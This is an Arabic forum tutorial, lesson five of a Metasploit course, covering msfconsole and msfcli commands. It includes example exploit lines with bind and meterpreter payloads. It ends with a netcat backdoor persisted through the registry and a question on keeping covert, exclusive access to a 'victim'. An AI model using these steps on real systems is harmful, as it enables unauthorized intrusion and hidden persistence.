الدرس الخامس : التعامل مع الميتاسبلويت[ دورة الميتاسبلويت ]

 السلام عليكم ورحمه الله

اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت

وهي

1- msfconsole
msfcli -2
msfgui -3
msfw eb -4

msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر

الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .


msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى

msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه

وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack


msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه

ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل


msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا


راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .


1- msfconsole

راح اشرح الاوامر المهمه

1- show

الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all


مثال :
show exploits
عرض الثغرات

show payloads
عرض payloads

show encoders

عرض encoders

show nops

عرض nops

show auxiliary

عرض auxiliary

show options

عرض الخيارات

2- use

بمعنى استخدم الثغره او auxiliary

مثال : [/b]

كود PHP:

الرمز:

use exploit/windows/smb/msdns_zone****

كود PHP:

الرمز:

use auxiliary/scanner/smb/version

البعض يتسائل كيف احفظ اسم الثغره كامل ؟

ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء

3- info

عرض معلومات الثغره

مثال :

كود PHP:

الرمز:

info exploit/windows/smb/msdns_zone****

او

كود PHP:

الرمز:

use exploit/windows/smb/msdns_zone****

ثم
info

set -4

بمعنى ضع للمتغير قيمه

مثال

set rhost 192.168.1.3
set payload windows/shell_bind_tcp

connect -5

مثل اداه النت كات

exploit and run -6

exploit تستخدم لتشغيل الثغرات

run يستخدم لتشغيل auxiliary


back -7

العوده للوراء

مثال :

كود PHP:

الرمز:

msf exploit(msdns_zone****) > back msf >

بقيه الاوامر راح تكتشفها مع الاستخدام بأذن الله


نروح لطريقه استخدام الثغره

استخدامها سهل ما تتعدا خمس اوامر

كود PHP:

الرمز:

اسم الثغره use show option  ليتم عرض المتغيرات  اسم المتغير set exploit

بعض الخيارات المخفيه حين اختيار الثغره .

show advanced
show evasion

ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات

الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,

show targets

عرض الاهداف التي تشتغل الثغره عليها


نروح للاداه الاخرى msfcli

نروح لكيفيه الاستخدام

استخدامها سهل جدا وعن طريق سطر واحد

كود PHP:

الرمز:

Usage: ./msfcli <exploit_****> <option=value> [mode] ====================================================     Mode           Description     ----           -----------     (H)elp         Youre looking at it baby!     (S)ummary      Show information about this module     (O)ptions      Show available options for this module     (A)dvanced     Show available advanced options for this module     (I)DS Evasion  Show available ids evasion options for this module     (P)ayloads     Show available payloads for this module     (T)argets      Show available targets for this exploit module     (AC)tions      Show available actions for this auxiliary module     (C)heck        Run the check routine of the selected module     (E)xecute      Execute the selected module

S = ملعومات الثغره

O = خيارات الثغره

ِE = تشغيل الثغره

P = عرض بايلود الخاصه

مثال لاستغلال ثغره

كود PHP:

الرمز:

./msfcli exploit/windows/***  payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1

بدال ما نكتب داخل msfconsole

كود PHP:

الرمز:

set rhost a.b.c.d set payload windows/****

نضع
rhost=
payload=

هذا الشرح كمختصر بأمكانك التطبيق


انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه

كانت عندي سلسله لكن طارت

تابع التطبيق , ومن ثم يأتي وقت السؤال

ملاحظه : اهم شيء التطبيق للثغره


بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح

في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم

انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم
ا
او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه

انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يبي يتصل بي

لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر

كيف اخلي الضحيه خاص بي بمعنى اخر انا اللي ابغى اتصل لوحدي ولا ابي احد يتصل معي

وايضا ما ابي اخلي الضحيه يشك

انا ابغى ناس تفكر مش تفتح القوقل وتبحث :-)